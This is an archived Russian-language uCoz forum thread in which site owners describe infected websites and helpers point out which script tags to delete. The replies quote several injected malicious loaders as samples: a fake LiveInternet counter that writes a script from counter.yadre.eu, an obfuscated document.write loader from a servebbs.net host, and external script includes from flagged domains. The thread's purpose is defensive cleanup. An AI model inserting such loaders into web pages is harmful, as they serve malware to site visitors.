Закрыто
Вирусы на сайтах_3 (архив для чтения)
Informatik6990
Сообщений: 1
Репутация: 0

Сообщение # 1846 | 14:27:44
Добрый день! На сайте http://arz-skola7.3dn.ru/ внизу слева для всех групп пользователей появляется всплывающее окно с надписью "vk.com ваша страница заблокирована, нажмите сюда чтобы разблокировать". Ссылка очень раздражает пользователей сайта. Вопрос: каким образом удалить такой код с сайта?
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1847 | 14:34:16
Informatik6990, из шаблона верхняя часть сайта удалите скрипт

Код
<!--LiveInternet counter--><script type="text/javascript">
document.write("<script type=\"text/javascript\" "+
"src='http://counter.yadre.eu/hit.js?t11.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"'><"+"/sc"+"ript>")
</script><!--/LiveInternet-->
1
2
3
4
5
6
7
это ложный счетчик ливы, который содержит вредоносный код

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
fiinika
Сообщений: 4
Репутация: 0

Сообщение # 1848 | 16:29:16
появилась порно реклама при загрузке сайта, до этого были объявления секс услуг, я их удаляла.
prazdnikkonfet.ucoz.ru
теперь антивирус блокирует мой сайт, пишет, что он грузит данные с зараженного сайта
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1849 | 16:40:09
fiinika, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

Код
<script type="text/javascript" src="https://dl.dropbox.com/u/36053555/scsct.js"></script>
- поле не что заменить оставляете пустым и заменяете во всех модулях

тоже самое делаете со скриптом

Код
<script type="text/javascript" src="https://dl.dropbox.com/u/36053555/scripta.js">


так же стоит удалить флешку http://smskorovka.ru/media/banners/cosmo_468x60.swf этот адрес был в базах антивирусов

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Dimon1
Сообщений: 29
Репутация: 1

Сообщение # 1850 | 17:44:40
Здравствуйте! 09.04.2013 Яндекс пометил сайт как опасный в поиске. Пробовал по несколько скриптов из блоков убирать и отправлять на перепроверку, но это ни чего не дало. Проверял на этом сервисе http://antivirus-alarm.ru/proverk....z.ru%2F как видно из результатов, только один антивирус показывает, что на сайте этот вирус Trojan.JS.Blacole. Помогите разобраться в этой проблеме. В последние 3 - 4 месяца ни каких скриптов не ставил на сайт, да и если ставлю отношусь к такому аккуратно, по возможности гружу файлы java скриптов на свой сайт, чтобы в них не было сделано несанкционированных изменений.

Из отчетов Яндекс видно, что проблема в блоках, так как ссылается на страницы сайта на которых не используются скрипты совсем.

Вот сайт. http://scorpionse.ucoz.ru

Благодарю за помощь!
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1851 | 17:52:46
Dimon1, из блока отправить смс удалить скрипт

Код
<script src="http://scorpionse.ucoz.ru/foto/sms/up.js" type="text/javascript"></script>
самое удивительное то, что вы сами залили вредоносный код к себе на сайт

из того места, где у вас установлена кнопка вверх удалить скрипт

Код
<script src="http://scorpionse.ucoz.ru/foto/vverx/png.js" type="text/javascript"></script>


видно, что вы пособирали скрипты где попало и оптом залили их на сайт. не собирайте, если ничего в этом не понимаете
у вас много лишнего

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Dimon1
Сообщений: 29
Репутация: 1

Сообщение # 1852 | 18:08:55
webanet, Спасибо Вам огромное!!! Все удалил. Они ведь уже месяца 4 на сайте эти скрипты.
Ronotika
Сообщений: 3
Репутация: 0

Сообщение # 1853 | 19:25:16
Доброго времени суток. Около недели назад появилась проблема с Доступно только для пользователей Блокируется браузерами Mozilla Firefox и Opera.
Опасен и для пользователя и для гостя.
Онлайн проверка на сервисах virustotal.com и online.drweb.com говорит о чистоте сайта, но теперь ещё и Яндекс пишет про опасность сайта.
Сервис 2ip.ru выдает сообщение "на сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код."
Последние скрипты были установлены около месяца назад.
Очень нужна помощь.
C уважением.
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 1854 | 19:28:48
Ronotika, все что вам нужно есть тут http://yandex.ru/infected?url=revival-sirius.ucoz.ru

Вредоносный код:

обращается по адресам, которые находятся в чёрном списке Яндекса, как распространители вредоносного ПО;
содержит exploit (по данным поведенческого анализатора Яндекса);
vellior
Сообщений: 8
Репутация: 5

Сообщение # 1855 | 20:12:57
Уважаемые, А что мне делать с моим сайтом neardor.ucoz.ru? Удалять или есть способ его реанимировать для Аваста? Который раз задаю вопрос и конкретного ответа не получил. Перебрал весь код, который был доступен. Ничего не получается, Аваст блокирует и все.
Помогите. пожалуйста
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 1856 | 20:48:01
vellior, скорей всего Avast ругается на код
Код
<script type="text/javascript"><!--
var url = 'http://cjuwfn.servebbs.net';
document.write('<sc' + 'ript language="JavaScript" ' +   
'src="' + url + '/6293/counter.xhtml"></sc' +   
'ript>')
//--></script>
1
2
3
4

Результат проверки с кодом
Результат проверки после удаления кода
vellior
Сообщений: 8
Репутация: 5

Сообщение # 1857 | 20:56:10
А где он стоит? Что-то я его не нахожу(((
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1858 | 20:57:45
Ronotika, из просилки зарегистрироваться или войти удалить скрипт

Код
<script src="http://china-air.ru/tsed.js" type="text/javascript"></script>


из кучи кода, которая представляет кнопку вверх удалить скрипт

Код
<script src="http://activiks.ru/img/png.js" type="text/javascript"></script>


и саму кнопку вверх лучше не подгружать с левых сайтов

из часов от валаби удалить поисковый спам

Код
<div tyle="display:none;"><a href="http://wallaby.ucoz.ru/"></a></div>

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1859 | 21:02:42
vellior, ваша проблема находится в блоке архив записей под кнопкой сервиса cy-pr.com

там находится псевдо счетчик. лучше удалить блок полностью, так как и сам счетчик от cy-pr.com с нулями в показателях вам тоже не нужен. удаляем блок полностью

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
vellior
Сообщений: 8
Репутация: 5

Сообщение # 1860 | 21:02:42
$Vladimir$,
помогите, пожалуйста удалить код. предоставлю права администратора
Поиск: